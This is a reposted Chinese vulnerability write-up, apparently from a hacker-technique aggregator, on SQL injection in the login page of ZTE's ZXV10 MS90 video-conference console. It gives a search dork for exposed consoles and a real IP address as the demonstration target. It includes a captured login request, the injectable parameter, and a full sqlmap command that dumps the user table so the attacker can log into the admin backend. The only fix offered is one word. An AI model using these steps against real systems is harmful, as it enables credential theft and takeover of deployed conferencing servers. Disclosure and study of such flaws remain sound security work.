记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

中兴某产品web控制台存在SQL注入

2014-12-12 21:15

ZXV10 MS90 视频会议管理系统,提供统一的视频会议业务及设备管理解决方案,集用户管理、会议管理、资源管理、终端注册认证、权限管理和MCU 设备管理等功能于一体。


中兴公司的视频会议管理系统,部分控制台部署在互联网,部分控制台虽然部署在互联网但是无法检索到。


百度搜索:ZXV10 MS90 V1.


测试多个版本登录处均存在SQL注入,可以获取数据库内所有信息。

 

演示地址:

http://211.137.33.53 前台
 

11.PNG



http://211.137.33.53:9000 后台
 

22.PNG





从前台抓取登录对话数据如下:



POST /loginpost.jsp?Language=CN HTTP/1.0
Accept: text/html, application/xhtml+xml, */*
Referer: http://211.137.33.53/
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
Pragma: no-cache
Content-Length: 68
DNT: 1
Host: 211.137.33.53
Cookie: JSESSIONID=BC5400C33FAB78733C3E2983B154AD3B; http211.137.33.5380=CN; M9000UserName=test@ss.com

loginname=test@ss.com&password=test&btnSubmit=%E7%99%BB+%E5%BD%95



其中loginnanme处存在注入

当loginname=XXuser和loginname=XXuser'时返回不同信息



 

feipie.png




 

pie.png





利用sqlmap进行注入,参数如下:


sqlmap -r /root/b --level=5 --dbms=mysql -p"loginname" --threads=10 --dump -T"user" -D"m9000_asc_db"



注入结果
 

sql.png





获取后台账号密码后即可登录后台。


 

33.PNG

 

解决方案:

过滤
 


知识来源: www.2cto.com/Article/201412/360392.html

阅读:118846 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“中兴某产品web控制台存在SQL注入”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云